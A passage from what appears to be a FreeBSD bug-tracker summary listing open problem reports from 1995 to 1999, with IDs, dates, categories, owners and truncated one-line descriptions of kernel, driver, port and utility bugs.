DMA IDE with generic chips o [1998/11/29] conf/8903 /etc/rc can do NFS mounts before the netw o [1998/12/01] i386/8924 File transfers. Upload is 71Kbs downloa o [1998/12/02] kern/8940 system clock runs extremely slowly (and s o [1998/12/06] kern/8981 this also fixes X crashes and sio silo ov o [1998/12/09] kern/9030 DMPno2 - PCCards are not being recognised o [1998/12/10] i386/9044 #.0 pkgs require libkrb o [1998/12/16] kern/9095 swap detect error o [1998/12/19] kern/9129 Is it miss take ? So, ep deriver dose not o [1998/12/20] i386/9140 NIS "Magic cookie" in master.passwd slays o [1998/12/21] kern/9163 [patch] squid does not join a multicast g o [1998/12/27] bin/9214 kldload(8) error messages are inadequate o [1998/12/30] i386/9244 2.2.8 RELEASE Fixit floppy doesn't work.. o [1998/12/31] bin/9252 [patch] login program "login" don't set K o [1999/01/03] kern/9296 pps driver missing header file o [1999/01/03] kern/9297 pps driver doesn't clear ppbus control po o [1999/01/06] bin/9350 nvi incorrectly reads files with very lon o [1999/01/06] kern/9355 can't select() for writes on a bpf o [1999/01/07] bin/9362 "lpc start queue" doesn't work in 3.0-R & o [1999/01/07] bin/9379 pppd does not go through all interfaces l o [1999/01/08] kern/9391 if_addmulti doesn't check for retifma == o [1999/01/09] kern/9407 "make kernel" yields buggy kernel in cera o [1999/01/09] kern/9408 parameter reversed to a pci_cfgwrite in p o [1999/01/09] kern/9411 System crash on swapping to hole-files o [1999/01/09] kern/9413 profiling does not work with elf kernels o [1999/01/11] bin/9440 obrien amd can't mount filesystems with type:=uf o [1999/01/11] bin/9444 mount_mfs uses lots of swap. o [1999/01/12] bin/9464 fenner Fix for fetch ignoring FTP_PASSIVE_MODE e o [1999/01/13] kern/9478 support for running a script from kldload o [1999/01/14] kern/9487 pcm: mixer's synth and cd devices are swa o [1999/01/14] bin/9495 su doesn't look at login.cnf all the time o [1999/01/15] bin/9516 ftpd doesn't honor invalid shelll in logi o [1999/01/17] kern/9537 ep0 driver : no buffer space available o [1999/01/17] bin/9544 syntax error concerning loading vinum fro o [1999/01/17] kern/9548 UNION fs corrupts data and has undefined o [1999/01/17] kern/9550 The latest -current as of 17 January has o [1999/01/21] kern/9599 SMP hang after reseting CPU 1 o [1999/01/21] kern/9612 grog NFS mounts on dual-homed server may hang o [1999/01/22] docs/9618 hoek many typos in groff_mm(7) o [1999/01/24] ports/9665 ache cannot start apache server o [1999/01/25] kern/9673 ISO CD-ROM Problem o [1999/01/25] ports/9688 cwt The current tcl80 port has problems, does o [1999/01/28] i386/9759 Tar process hangs on buggy tapes o [1999/02/01] kern/9862 system crashes writing to msdos jaz disk o [1999/02/02] kern/9883 MGET()(and variants) return NULL with M_W o [1999/02/04] misc/9903 thread enabled program can't use popen/sy o [1999/02/04] kern/9910 Heavy traffic renders FreeBSD acting as f s [1999/02/06] kern/9927 gibbs the ahc driver doesn't correctly grok swi o [1999/02/06] i386/9933 No error reported writing to write-protec o [1999/02/06] kern/9935 vmstat reprots bad AVM values o [1999/02/08] kern/9961 When loading if_ppp_mod.o system crashes, o [1999/02/08] i386/9962 Install Panics in with integer divide fau o [1999/02/08] kern/9974 Large amounts of kernel clock drift with o [1999/02/09] kern/9980 savecore fails with large (2gig+) swap pa o [1999/02/09] bin/9982 inet_addr(3) should be return 32bit uint. o [1999/02/10] misc/10009 jdp dlopen will crash when opening some strip o [1999/02/11] kern/10021 MOUNTING A EXT2FS A AFTER MOUNTING AN MSD o [1999/02/11] bin/10031 ypxfr does not work with Solaris master s o [1999/02/13] kern/10066 problem with a X-Window and syscons drive o [1999/02/14] i386/10089 ATAPI tape driver (wst) doesn't handle En a [1999/02/14] ports/10094 jfitz autogeneration of msql user failed o [1999/02/15] kern/10107 interlock situation with exec_map and a p o [1999/02/18] i386/10150 Compaq fxp0 Does not work on 3.0 or 3.1 b o [1999/02/18] i386/10151 ATAPI CD problem o [1999/02/19] conf/10163 init does not start when /var/msgs is a s o [1999/02/23] bin/10230 -T and -B not implemented on filehandles o [1999/02/25] misc/10259 FTP install hangs for 3.1-RELEASE o [1999/02/25] bin/10264 passwd(1) tryis NIS even with `-l' switch o [1999/02/25] kern/10265 file locking does not work with kernel pt o [1999/02/26] kern/10280 Display Adapters (PCI) probed wrong way - o [1999/02/28] misc/10302 installer o [1999/02/28] bin/10312 ken pciconf -l generates output incompatible o [1999/02/28] kern/10316 le0 goes OACTIVE after some time o [1999/03/01] bin/10341 memory leak in setenv(3) o [1999/03/02] bin/10353 ypserv gets segmentation violation o [1999/03/03] kern/10381 hlfsd/NFS failure -- directory cached bet o [1999/03/05] kern/10411 top, vmstat, iostat show 0% cpu idle & us o [1999/03/06] misc/10418 libpam is built before libradius/libtacpl o [1999/03/07] kern/10466 resume causes crashes if BIOS extmem != R o [1999/03/08] kern/10492 broadcast IP address can be set on interf o [1999/03/09] bin/10510 Remote cvs botches commits on occassion o [1999/03/09] bin/10511 incorrect return value in kvm_read(3) and o [1999/03/11] bin/10553 syslogd suddenly stopped logging o [1999/03/14] kern/10581 Kernel panic while using find on an ext2 o [1999/03/14] kern/10594 EXT2FS mount problems o [1999/03/14] bin/10596 I can't find out where someone is logged o [1999/03/15] misc/10599 [PATCH included]malloc/free breaks in cer o [1999/03/15] kern/10603 dcs Random system panics o [1999/03/15] kern/10607 Fast forwarding breaks when arp cache exp o [1999/03/16] bin/10615 make installworld DESTDIR=/some/dir o [1999/03/16] i386/10626 RTC BIOS diagnostic error on install o [1999/03/16] bin/10633 obrien [patch] tcpslice timezone problem and upd o [1999/03/17] i386/10646 Bridge code missing from ed0 driver in 3. o [1999/03/19] kern/10671 setlogin(2) return EINVAL for length of n o [1999/03/20] kern/10698 de driver doesn't work with some tulip bo o [1999/03/23] kern/10747 [PATCH] ipfirewall `deny' rules act as `r o [1999/03/24] bin/10774 sio0 doesn't work well, i belive the prob o [1999/03/24] kern/10778 "ipforward_rt" is not cleared when routin o [1999/03/25] bin/10784 `make aout-to-elf-build' died in /usr/src o [1999/03/25] bin/10785 make aout-to-elf-install died in info tar o [1999/03/25] kern/10789 Second config of kernel doesn't overwrite o [1999/03/26] bin/10807 host(1) is broken - multiple options in o o [1999/03/27] bin/10821 des getpwent() fails on NIS clients after dro o [1999/03/29] i386/10862 dcs wd.c STILL cannot recognize correct disk o [1999/03/30] kern/10870 eivind Kernel panic when writing to write-protec o [1999/03/30] misc/10879 Cannot build aout binaries under 3.1-RELE o [1999/03/30] bin/10880 Profiler libraries missing o [1999/04/01] bin/10912 /bin/sh: Fix to prevent infinite loops on o [1999/04/03] i386/10928 su reboots the system after one day uptim o [1999/04/03] i386/10935 PCI cards detected twice o [1999/04/04] ports/10946 se kdm 1.1 does not work correctly - XBINDIR o [1999/04/05] bin/10963 brian date -v dosen't quite work o [1999/04/05] i386/10969 kernel fails to compile with ccs0 o [1999/04/06] i386/10983 lnc NIC driver doesn't work o [1999/04/06] bin/10991 lpd hangs system if printer not ready on o [1999/04/07] kern/11004 Quota Issues on SMP o [1999/04/07] bin/11005 `umount -f' does not work if the NFS-serv o [1999/04/08] misc/11024 getpwnam(3) uses incorrect #define to lim o [1999/04/10] ports/11059 ache ports/security/pgp does not extract o [1999/04/11] kern/11080 fatal trap 18 while trying to mount inval o [1999/04/11] kern/11084 3.1-R kernel trap 12 with interrupts o [1999/04/13] kern/11115 Sockets die in LAST_ACK and FIN_WAIT_1 st o [1999/04/13] bin/11119 NFS quotas fail to report if alternate fi o [1999/04/14] bin/11137 /bin/ps output loses the values for all p o [1999/04/16] kern/11164 The ie network driver panics during the i o [1999/04/16] bin/11169 warning: pointer to wrong page in cron(8) o [1999/04/18] kern/11199 3.1-RELEASE kernel page fault (trap 12) u o [1999/04/18] i386/11200 AMD PCnet lnc0/lnc1 problem o [1999/04/18] kern/11208 Complete system hang/freeze. No PANIC me o [1999/04/20] bin/11247 fetch doesn't notice FTP error after RETR o [1999/04/21] kern/11255 Fore System ATM Card not working o [1999/04/21] kern/11266 frequent crashes with "Page fault, fatal o [1999/04/22] bin/11283 fetch http-timeout/timestamp bug o [1999/04/23] i386/11291 anic: ffs_alloccg: map corrupted o [1999/04/23] bin/11296 fetch(1) fails to resolve names in http m o [1999/04/26] conf/11336 Broken data sent to printer through devic o [1999/04/28] kern/11366 Filesystem can cause hang/crash in certai o [1999/04/28] conf/11376 NFS mount may be happening too soon in /e o [1999/04/29] bin/11382 generated code using rpcgen with -b optio o [1999/04/29] kern/11385 PCNet/PCI Ethernet adapter works in 3.1-R o [1999/04/29] i386/11395 ghostscript5.50 does not print properly, o [1999/04/30] kern/11405 pwd_mkdb with no tmp space leads to kerne o [1999/05/02] i386/11454 mkdir() and chdir() doesn't check argumen o [1999/05/03] kern/11462 CS network interface driver (for CS89XX b o [1999/05/03] bin/11464 obrien union copies likely broken for alpha egcs o [1999/05/04] kern/11490 yokota VESA+VM86+Splash == unstable system o [1999/05/05] kern/11507 msmith CS89XX (i386/isa/if_cs.c) fails to proper o [1999/05/05] kern/11513 cannot mount CD-ROM: Device not configure o [1999/05/05] misc/11523 3.1-STABLE BRIDGE option does not work o [1999/05/05] misc/11525 [PATCH] Networking patches to increase # o [1999/05/07] gnu/11562 tar verification doesn't work o [1999/05/07] kern/11563 pci_unmap_int doesn't do anything o [1999/05/10] ports/11636 jfitz p5-Mail-Folder missing dependencies o [1999/05/12] i386/11664 lnc1 NIC fail to work o [1999/05/12] bin/11666 ypserv fails to reply host name resolutio o [1999/05/12] kern/11679 httpd and perl5 processes stuck in "nocha o [1999/05/13] kern/11686 APM: Always "Resume failure" from suspend o [1999/05/13] kern/11692 3.1-stable deadlock o [1999/05/13] kern/11697 dg Disk failure hangs system o [1999/05/14] i386/11720 FreeBSD 2.2.8 can't load fixit disk o [1999/05/18] kern/11766 Can not traceroute through ipnat. o [1999/05/18] i386/11773 yokota mouse works at setup time. Under X it go o [1999/05/19] misc/11778 mpz_get_str() in libgmp leads up to cored o [1999/05/19] misc/11790 boot manager bug o [1999/05/20] misc/11800 gibbs Problem with scsi AHA2940 and sony SDT-20 o [1999/05/20] i386/11801 Remounting CD on IDE CDROM after eject fa o [1999/05/20] kern/11808 read/write mounted write-protected floppi o [1999/05/21] kern/11821 /dev/fd0a hangs on large files, including o [1999/05/22] docs/11852 jkh 3.X install requires 12MB of RAM, not 8 o [1999/05/23] kern/11867 Sound driver loses interrupts, no sound o [1999/05/28] kern/11911 3.1-R : writing file larger than floppy s o [1999/05/28] conf/11913 jkh Problem about /stand/sysinstall and /etc/ o [1999/05/28] kern/11915 access system call says file is readable o [1999/05/28] kern/11919 kldload doesn't return error on loading a o [1999/05/28] kern/11922 missing reentrant interfaces for getpwnam o [1999/05/29] kern/11928 kldload loads kernel modules even if ther o [1999/05/29] kern/11936 wine don't work (SMP) (-STABLE) o [1999/05/29] kern/11937 vm problems after havy memory usage o [1999/05/31] kern/11969 VM_fault with mmap'd CDROM data. o [1999/06/02] i386/11991 fdisk does not assign slices to unused pa o [1999/06/02] bin/11992 /usr/src/sbin/mountd/mountd.c has '#ifdef o [1999/06/04] kern/12022 System clock timewarps o [1999/06/06] bin/12054 explicit -ltermcap after -lncurses causes o [1999/06/06] kern/12062 sa tape driver with Cipher 60M SCSI QIC t o [1999/06/08] bin/12091 syslog packets from a remote machine are o [1999/06/08] kern/12092 vpo driver not working in 3.2-RELEASE o [1999/06/09] kern/12104 Certain cdcontrol commands don't work pro o [1999/06/10] bin/12120 named crashes. o [1999/06/10] gnu/12122 cc hangs on STDIN with -pipe and .s files o [1999/06/11] bin/12136 obrien /sbin/dhclient-script: weird route comman o [1999/06/11] bin/12137 something wrong with shell -- functions w o [1999/06/12] ports/12174 ache bash terminate with corefile if pid > 320 o [1999/06/12] gnu/12175 gdb crashes with pids > 32736 o [1999/06/13] bin/12191 wcol is trying to allocate a shared memor o [1999/06/15] misc/12221 djpeg halt's freebsd box o [1999/06/16] bin/12242 segmentation fault running /usr/bin/fmt o [1999/06/16] kern/12247 userlevel program let kernel hang o [1999/06/17] kern/12262 pcm sound driver with SB16pnp does not ap o [1999/06/18] bin/12272 The ctype locales print an error message o [1999/06/18] kern/12274 cd mount problem o [1999/06/20] kern/12305 clock() ticks backwards o [1999/06/21] kern/12320 error 6: panic: cannot mount root (2) o [1999/06/22] bin/12349 des 3.2-R inetd doesn't re-read ALL configura s [1999/06/24] kern/12381 bde Bad scheduling in FreeBSD o [1999/06/25] conf/12387 CDROM boot failure on Thinpad 770X, 380ED o [1999/06/25] kern/12394 3.2-RELEASE, rl0 ethernet interface freez o [1999/06/28] kern/12434 signal 11 (core dumped) on mysqld when ma o [1999/06/30] kern/12464 bad reference in struct vm_zone o [1999/07/01] kern/12484 [PATCH] bpf_filter() broken o [1999/07/03] bin/12496 yppush broken when pushing to 2 or more s o [1999/07/06] i386/12529 Linksys ether16 NE2000 compat. won't conf o [1999/07/06] bin/12538 getpwuid() NIS UID override fails o [1999/07/07] kern/12551 mks ASIC output is shifted following a short o [1999/07/07] docs/12557 nik There are no man pages for the widely use a [1999/07/08] bin/12564 jkh Sysinstall can not use live filesystem fr o [1999/07/09] misc/12577 Can't link code using catopen o [1999/07/09] ports/12584 stb directories made during 'make install' ar o [1999/07/13] kern/12632 Panic (trap 18) with Symbios SCSI control o [1999/07/14] ports/12637 ports patch to help multi-byte support in windo o [1999/07/14] misc/12640 Can use 2nd CD-ROM for fixit mode. o [1999/07/15] kern/12646 IGMP reports not sent if no multicast rou o [1999/07/16] gnu/12662 tar verification doesn't work in 3.2-RELE o [1999/07/18] kern/12703 tx0 truncates skip packets o [1999/07/20] bin/12727 billf Game patches from NetBSD o [1999/07/21] conf/12745 diffs to delay start of amd rwhod timed o o [1999/07/21] ports/12746 ache problem with bash-2.03(1) port (/usr/port o [1999/07/21] i386/12749 marcel Bug in link() and all other filename func o [1999/07/22] kern/12758 Adjusting the idle priority of a process o [1999/07/23] i386/12771 lpt hangs and never works again, even aft o [1999/07/24] kern/12800 buffer leak in cluster_wbuild o [1999/07/26] alpha/12821 alpha slib.aq for the 3.2-RELEASE alpha distrib o [1999/07/27] kern/12831 sos CD-rom cannot be mounted o [1999/07/27] conf/12832 config -g creates broken Makefile in 3.2- o [1999/07/27] kern/12838 PC-Card ctlr(0) Vadem 365 support seems b o [1999/07/28] misc/12856 installworld over nfs broken (3.2S) o [1999/07/29] kern/12869 panic: softdep_flushfiles: looping o [1999/07/30] kern/12884 Hot to panic FreeBSD-3.2-Release o [1999/07/31] ports/12905 jmz Graphical setup utility won't always inst o [1999/08/01] bin/12911 alfred NFS umounts are not properly done if just o [1999/08/01] bin/12912 [PATCH] lpd leaves lock file permissions o [1999/08/02] kern/12927 [PATCH] using BROKEN_KEYBOARD_RESET optio o [1999/08/02] ports/12930 asami libtool create defuct makefiles if PREFIX o [1999/08/03] misc/12938 gethostbyaddr(209.201.116.19) - Bus error o [1999/08/04] kern/12979 Response time continually slows on idle m o [1999/08/05] conf/12984 /etc/rc* does not contain any support for f [1999/08/05] docs/12988 doc [Patch] Fix more occurances of 'sd' in FA o [1999/08/05] kern/12991 system queue is cleared when a port or pi o [1999/08/06] kern/12996 ifconf in sys/net/if.c returns larger buf o [1999/08/06] bin/13008 pthread_kill does not always work o [1999/08/07] conf/13013 Selecting CDROM as install media doesn't o [1999/08/08] kern/13022 ipfilter is out-of-date o [1999/08/08] misc/13027 sysinstall has no /dev entry for wfd0s4 ( o [1999/08/10] i386/13058 Installation hangs after commit f [1999/08/13] kern/13113 panic related (proberbly) to vnode o [1999/08/14] kern/13141 se Multiple LUN support in NCR driver is bro o [1999/08/14] ports/13145 se kaudioserver runs amok on logout o [1999/08/15] kern/13150 panic: ufs_dirbad: bad dir o [1999/08/15] ports/13170 ports New port: UW-Imap with maildir and qmail o [1999/08/15] gnu/13172 Bug in workaround of russian locale & sor o [1999/08/16] kern/13180 panic: ffs_alloccg: map corrupted o [1999/08/17] kern/13196 [BTX] page in BTX has problem(quit key) o [1999/08/17] kern/13198 panic: vm_fault: fault on nofault entry o [1999/08/17] gnu/13200 The assembler chokes on very long operand o [1999/08/18] kern/13234 .../netinet/ip_input.c should include opt o [1999/08/21] bin/13286 jhay [SECURITY] Potential IPXrouted(8) /tmp se o [1999/08/24] bin/13350 make clean in bsd.obj.mk no longer proper o [1999/08/24] ports/13370 ache elm-port upgraded, improved o [1999/08/25] misc/13378 Tecra 8000 hangs in UserConfig, cannot co o [1999/08/25] kern/13382 Only 1 parallel port supported if pps ena o [1999/08/25] bin/13383 sys/netinet/in.h violates C++ spec. o [1999/08/26] kern/13405 syslogd get system hang o [1999/08/27] gnu/13427 gdb reports wrong info o [1999/08/28] gnu/13438 objc forward core dump using system cc o [1999/08/29] i386/13452 changing to root device wd0s1a \n error 2 o [1999/08/29] bin/13463 /bin/sh does not handle interrupts correc o [1999/08/30] misc/13470 Old problem re-introduced: TCP sucket buf o [1999/08/31] bin/13504 troubles with the ipfw tool o [1999/09/01] kern/13517 hang system o [1999/09/05] kern/13587 Voxware MIXER_READ ioctl corrupts memory o [1999/09/06] kern/13593 Problems with FIFO and select o [1999/09/07] kern/13612 gibbs "Timedout SCB handled by another timeout" o [1999/09/07] kern/13630 system halts after npx0 detected on 3.2 i o [1999/09/07] kern/13632 Floppy hangs system o [1999/09/08] kern/13644 select(2) timer inaccurate, especially wi o [1999/09/08] kern/13646 Kernel Trap error when booting 3.3-RC ker o [1999/09/09] i386/13655 sysmouse, signal 10 and XF86_S3 o [1999/09/09] ports/13656 obrien update ports: dlint 1.3.3 o [1999/09/10] kern/13678 sos hard lockup's on tsleep in atapi_queue_cm o [1999/09/10] bin/13679 ncurses-based programs eat 100% CPU after o [1999/09/10] bin/13691 tcpslice cannot extract over 2GB part of o [1999/09/11] bin/13703 MCNP compilation problem o [1999/09/12] bin/13711 root fs not properly unmounted after shut o [1999/09/12] ports/13714 stb netatalk-1.4b2+asun2.1.3 fails chmod g+s o [1999/09/13] conf/13724 Prevent ".: Out of file descriptors" erro o [1999/09/13] gnu/13729 strip(1) exits with an error on script fi o [1999/09/13] kern/13736 enabling NAT on 3.3RC results in panic sb o [1999/09/13] kern/13740 wrong IP statistics o [1999/09/14] docs/13746 doc Incorrect version in FAQ o [1999/09/14] kern/13752 "tl0: adapter check: 180005" mesages keep o [1999/09/15] kern/13757 wpaul tl0: adapter check: 180005 mesages keep c o [1999/09/15] i386/13765 memory problem: compilation of emacs dies o [1999/09/15] bin/13766 ldconfig doesn't recognize symbolic links o [1999/09/15] bin/13768 sh MAKEDEV cdN creates all cd(N-1)-device o [1999/09/15] misc/13771 brian Packet fragment filter bug in user-land P o [1999/09/16] conf/13775 multi-user boot may hang in NIS environme o [1999/09/16] ports/13776 jmz The XFree86-3.3.5 port -- one of the kerb o [1999/09/16] conf/13785 boot block/manager problem at installatio o [1999/09/17] i386/13787 lnc driver isn't really the lnc driver o [1999/09/18] kern/13810 3.3 panic rlist_free: free start overlaps o [1999/09/18] i386/13811 ide cdrom stops recognizing audio cdroms o [1999/09/19] bin/13818 `ipfw' doesn't grok "log" keyword o [1999/09/19] misc/13837 peter src/contrib/bind is outdated. o [1999/09/19] ports/13839 se kdegraphics11 'make PREFIX' fix, one comp o [1999/09/19] i386/13847 missing support for INT 0x13 extensions i o [1999/09/20] i386/13857 Problem with switching between processes o [1999/09/22] conf/13900 jkh [PATCH] sysinstall can get SIGPIPE if a d o [1999/09/22] alpha/13912 alpha unaligned access Problem seems to be aff o [1999/09/23] misc/13920 pppd acts differently on 3.3-RELEASE ("mi o [1999/09/24] kern/13941 ncr0: SCSI phase error on GENERIC kernel o [1999/09/26] misc/13978 peter a write to last column bug appears since o [1999/09/26] bin/13980 Parameter expansion pattern removal bug i o [1999/09/27] kern/13997 phk RLIMIT_NPROC works unadequately for jails o [1999/09/28] kern/14026 Many network connections get left in the o [1999/09/28] i386/14027 "disklabel -r -w" on new disk reports "No o [1999/09/28] kern/14033 Data acq process gets stuck in vmopar o [1999/09/29] kern/14042 mbuf shortage and allocation with M_WAIT o [1999/09/30] kern/14060 3.3-STABLE on primary mail server panics o [1999/09/30] bin/14069 Buffer overflow in mail(1) o [1999/09/30] kern/14072 Rebooting in FreeBSD 3.3 wipes out known o [1999/10/01] conf/14075 CDROM not being recognized during certain o [1999/10/02] kern/14096 parallel port -- ppi -- driver broken aft o [1999/10/03] bin/14102 make world -DWANT_AOUT fails in lib/compa o [1999/10/04] misc/14121 resurfaced bug in rmt preventing remote d o [1999/10/04] kern/14123 lnc driver is not working o [1999/10/04] ports/14128 torstenb Wrong group and mode on postdrop program o [1999/10/04] i386/14135 lpt1 nolonger exists after 3.2-RELEASE o [1999/10/05] kern/14144 bad conversions in kern_fork() o [1999/10/05] ports/14153 obrien xwpe has no distribution tar file o [1999/10/07] misc/14178 FreeBSD 3.2 - Calls from CGI scripts, cro o [1999/10/07] kern/14183 grog bridge forwarding corrupted broadcast IP o [1999/10/07] ports/14186 se kdebase11 package not compiled correctly o [1999/10/09] kern/14226 panic: no mbufs o [1999/10/10] bin/14250 restore(8) can loop if tty goes away or w o [1999/10/10] misc/14254 [Fwd: clock(3) runs backwards! (fwd)] (fw o [1999/10/10] kern/14257 error 6: panic: cannot mount root (2) - d o [1999/10/11] misc/14264 Combination of aio_read(), pthread_cond_w o [1999/10/12] i386/14282 Using FreeBSD 3.* ThinkPad 600E doesn't r o [1999/10/12] ports/14283 ache apache13 htpasswd dumps core o [1999/10/12] kern/14285 dillon NFS client appears to lose data o [1999/10/14] i386/14324 wst OR atapi drivers won't work o [1999/10/14] misc/14326 kerberos4 pam-related breakage in current o [1999/10/14] misc/14327 names used in netdb.h may conflict with n o [1999/10/14] i386/14333 AHA-1542A not supported by FreeBSD 3.x (" o [1999/10/14] i386/14334 imp AHA-1542A not supported by FreeBSD 3.x (" o [1999/10/15] kern/14354 grog vinum cannot compile for alpha o [1999/10/19] ports/14423 obrien Build of lsof fails since 'struct namecac o [1999/10/20] misc/14431 Network Interface Problem o [1999/10/20] ports/14434 ache update ports: ftp/wu-ftpd to 2.6.0 o [1999/10/20] bin/14444 enigma command can't decrypt files encryp o [1999/10/21] i386/14446 Doesn't boot on Mobile Celeron o [1999/10/22] kern/14457 SIOCGIFCONF uses too much memory s [1999/10/23] bin/14472 sheldonh date for Y#K o [1999/10/25] ports/14524 markm PERL 5.005_03 Config.PM on 3.2-STABLE say o [1999/10/25] kern/14536 kernel panic on 64KB block size ufs files o [1999/10/26] kern/14546 SB128PCI work incorrect play wav-files un o [1999/10/26] ports/14548 peter rdist6 has /usr/lib/sendmail compiled int o [1999/10/26] kern/14549 3C509 broken in 3.3 o [1999/10/27] kern/14566 Non-kernel programs have little/no contro o [1999/10/30] ports/14615 taoka [PATCH] Emacs scrambles the screen on the f [1999/10/31] ports/14625 green pidentd doesn't work correctly for finger o [1999/10/31] bin/14626 sendmail 8.9.3 bug with aliases in -CURRE o [1999/11/03] kern/14685 setjmp/longjmp in threaded app cause subs o [1999/11/03] i386/14689 waitpid doesn't harvest child process whe o [1999/11/03] ports/14696 ports New port: wmGrabImage o [1999/11/04] bin/14709 umountall requests possibly mishandled by o [1999/11/04] kern/14712 root has access to NFS mounted directorie o [1999/11/05] kern/14722 TCP connections hangs in FIN_WAIT_2 for > o [1999/11/05] bin/14729 when sysinstall is running as init it sho o [1999/11/06] docs/14738 doc wrong type of arg is described for kgetst o [1999/11/07] kern/14765 Something wrong for UDMA for Gigabyte 586 o [1999/11/07] bin/14782 ypbind can not bind to Solaris NIS master o [1999/11/08] kern/14787 /dev/lpt0 doesn't work unless/until you d f [1999/11/09] kern/14797 Serious locking problem in CURRENT o [1999/11/09] i386/14799 Promise Ultra33 doesn't work o [1999/11/09] i386/14806 if_tun.ko conflicts with built-in tunnel o [1999/11/10] misc/14811 getpwent is not enumerating all entries i o [1999/11/10] kern/14812 de0 driver malfunctions in full-duplex o [1999/11/10] kern/14814 4.0-CURRENT SMP mode causes ep0 slow o [1999/11/11] ports/14826 obrien security/fwtk smapd calls sendmail with w o [1999/11/12] bin/14844 rwhod is remotely crashable o [1999/11/12] kern/14848 Frame Relay support, corrected o [1999/11/12] kern/14849 newpcm doesn't work with Vibra16X a [1999/11/12] misc/14856 billf ftp stalls on FreeBSD 3.3 (CDROM) tested o [1999/11/14] ports/14883 dbaker ports/misc/rc5des build fails o [1999/11/14] ports/14888 ports ports/security/bjorb build fails o [1999/11/14] kern/14890 ffs_valloc: dup alloc o [1999/11/15] misc/14895 portmap bug (when run with -v flag) o [1999/11/15] kern/14900 3.3-RELEASE panic in pmap_pte_quick() o [1999/11/15] i386/14907 ipfw show take wrong values of counter/or o [1999/11/15] conf/14913 Fix for "arplookup 127.0.0.1 failed: coul o [1999/11/16] kern/14917 grog DMA doesn't works with ALI ALADDIN M1543/ o [1999/11/16] kern/14918 Write access to write protected media cau o [1999/11/16] bin/14920 install(1) hangs when intalling files sam o [1999/11/16] ports/14926 ports JBIG-KIT port upgraded to the version 1.1 o [1999/11/16] misc/14932 "more" eating up CPU on users with shell= o [1999/11/16] i386/14937 ipfw -a list show wrong information o [1999/11/17] ports/14944 ports No stable Gimp in ports o [1999/11/17] i386/14946 rmt - remote magtape protocol o [1999/11/17] ports/14955 jmz XFree86-port does not support ru_SU.* loc o [1999/11/17] kern/14960 Compaq EISA array controller not working o [1999/11/17] kern/14962 PnP doesn't detect AWE64 when PnP modem i o [1999/11/17] misc/14964 Network Interface Configuration Problem a o [1999/11/18] bin/14975 lpc start subcmd doesn't start printing o [1999/11/18] bin/14978 lprm(1) does not kill active daemon if ho o [1999/11/18] ports/14987 ports graphics/xpm does not build a dynamic lib o [1999/11/19] kern/14997 NFSv3 open O_EXCL fails to set proper "at o [1999/11/19] misc/15001 'fetch' doesn't work for http when behind o [1999/11/19] i386/15003 3C574 (ep0) reads bogus ethernet address o [1999/11/21] i386/15018 Printingproblem o [1999/11/22] bin/15046 /sbin/dhclient-script ignores resolv.conf o [1999/11/23] i386/15062 i4b stops working after some time o [1999/11/23] bin/15070 vfprintf/cvt/__dtoa race condition in thr o [1999/11/24] i386/15074 Two different panics when running Linux b o [1999/11/24] kern/15075 Intel Etherexpress Pro timeouts when >1 c o [1999/11/24] misc/15080 corrupt tree/subtree on primary ftp serve o [1999/11/24] ports/15085 ports fixing-upgrading the editors/xenon port o [1999/11/24] kern/15086 Borked sscape drivers :) o [1999/11/25] kern/15087 3.3-STABLE panic while starting daemons ( o [1999/11/25] kern/15089 mmap of files from 2K-block device failed o [1999/11/26] ports/15100 ports new port links-0.80 s [1999/11/26] bin/15101 joe [PATCH] cdcontrol does not perform bounds o [1999/11/26] ports/15107 green Patch for FreeBSD s/key support in OpenSS o [1999/11/26] misc/15109 problem printing graphic pages o [1999/11/27] ports/15120 ports [PATCH] mail/pine4 pgp support does not h o [1999/11/27] ports/15123 rse www/apache13-modssl has PREFIX problems f o [1999/11/28] kern/15136 Panic on MSDOS FS mount o [1999/11/28] ports/15137 ports [PATCH] www/lynx-ssl can't find OpenSSL i o [1999/11/28] conf/15150 Taking encoding scheme latin1 into accoun o [1999/11/28] ports/15157 ports [PATCH] Environment Botch in KDM o [1999/11/30] misc/15190 crashing while in a multiplatform environ o [1999/11/30] kern/15193 PCCARD ethernet interface not returned by o [1999/12/01] kern/15204 systems panics when ktrace-ing o [1999/12/01] kern/15206 Ethernet driver if_vr.c (VIA Technologies o [1999/12/01] ports/15212 ports wserv is in the wrong location, should be o [1999/12/02] misc/15228 C++ exceptions+threads SIGABRTs. o [1999/12/02] kern/15235 dillon Race conditions in pipe_write causes kern o [1999/12/03] ports/15241 ports Update mod_dav to 0.9.13 o [1999/12/05] misc/15269 error server timeout downloading small fi o [1999/12/05] ports/15287 ports Fix for linux-netscape not requiring X ao o [1999/12/07] bin/15328 deischen Threaded "system" does'nt work in -curren o [1999/12/07] kern/15345 lkm no longer works after 3.3 o [1999/12/07] kern/15346 lkm no longer works after 3.3 o [1999/12/07] ports/15348 ports [update] japanese/tcl80 o [1999/12/07] ports/15349 ports [update] japanese/tk80 o [1999/12/08] kern/15357 newton make depend fails due to missing opt_svr4 o [1999/12/08] i386/15364 Flash Player 4 for Linux has no sound wit o [1999/12/08] kern/15365 Fatal trap 18 (integer divide fault) when o [1999/12/09] ports/15368 ports Update ftp/mirror o [1999/12/10] ports/15395 ports fix port: net/mrtg (BUILD/LIB_DEPEND prob o [1999/12/10] ports/15404 ports www/p5-CGI: Wrong BUILD_DEPENDS? o [1999/12/11] bin/15414 syslogd -ss disables all network logging o [1999/12/11] kern/15420 3.3-RELEASE Kernel freeze o [1999/12/11] ports/15426 ports build of devel/t1lib hangs in configure o [1999/12/11] docs/15427 doc Some man pages print a blank first page o [1999/12/12] ports/15437 ports update graphics/gd port to support ttf an o [1999/12/12] ports/15438 ports p5-GD port update (1.18 -> 1.23) o [1999/12/12] ports/15442 ports upgrade of nethack port to 3.2.3, which h o [1999/12/12] kern/15446 Unpredictable enabling of SCSI Tagged Que o [1999/12/12] kern/15447 Seagate ST32550 (Barracuda 2LP) may be a o [1999/12/12] bin/15450 The name of the tagfile is left in the pa o [1999/12/12] kern/15452 getfh syscall is only installed with NFS o [1999/12/13] i386/15460 Installation with Compaq SMART-2DH Array 754 problems total. Non-critical problems S Submitted Tracker Resp. Description ------------------------------------------------------------------------------- a [1995/01/11] i386/105 bde Distributed libm (msun) has non-standard s [1995/05/13] bin/401 Add REMOTE_* variables s [1995/06/15] bin/517 Bad group change with 'install' o [1995/07/09] misc/605 wpaul NIS: get*bynis routine problems s [1995/08/05] gnu/655 ld -r of shared objects worked in 1.1.5, s [1995/08/07] bin/658 ifconfig alias has to be separately given s [1995/09/26] kern/742 syslog errors accessing Mac hard disks [p s [1995/10/03] kern/765 umount -f can`t umount a NFS filesystem 